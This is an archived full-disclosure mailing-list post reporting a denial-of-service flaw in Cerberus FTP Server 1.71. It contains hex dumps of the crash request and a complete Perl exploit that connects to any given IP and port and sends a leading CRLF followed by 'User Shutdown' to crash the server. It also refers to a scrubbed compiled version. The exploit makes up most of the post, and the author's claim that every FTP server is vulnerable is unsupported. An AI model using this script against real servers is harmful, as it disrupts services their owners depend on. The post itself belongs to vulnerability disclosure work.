From: florianrock at web.de (Florian Rock)
Subject: FTPServer Denial Of Service Vulnerability

I have found a very serious hole in FTPServer
The Exploit is tested on Cerberus FTP Server 1.71 and a own coded, but I think all FTPServer are Vulnerable
Sorry but i have to less ftpserver to test

And so it Works
Typical request:
00000000  55 73 65 72 20 53  68 75 74 64 6f 77 6e 0d 0a    User Shutdown..

Exploit request:
00000000  0d 0a 55 73 65 72 20 53  68 75 74 64 6f 77 6e    ..User Shutdown

I've coded an exploit:
See attached file: ftpcrash.exe (ziped) for people how have no perl

My exploit (in perl):
[code]
-ftpcrash.pl-
print "Exploit for FTP-Server\n";
print "   by The real Remoter\n";
my $usage = "\nftpcrash <IP> <Port>\n";
die "$usage" unless $ARGV[0] && $ARGV[1];
use Socket;
my $remote = $ARGV[0];
my $port = $ARGV[1];
my $iaddr = inet_aton($remote);
my $proto = getprotobyname("tcp");
my $paddr = sockaddr_in($port, $iaddr);
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) or die "Can't connect to " . $remote;
print "Sending exploit\n";
$msg = "\x0d\x0a";
$msg = $msg . "User Shutdown";
send(SOCK,$msg, 0) or die "Can't send Exploit";
sleep(1);
print "Server Crashed!";
sleep(1);
exit;
[/code]

Sorry for my bad english (I'm german)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030818/93936a4b/attachment.html
-------------- next part --------------
A non-text attachment was scrubbed...
Name: ftpcrash.zip
Type: application/octet-stream
Size: 388061 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030818/93936a4b/ftpcrash.obj

Powered by blists - more mailing lists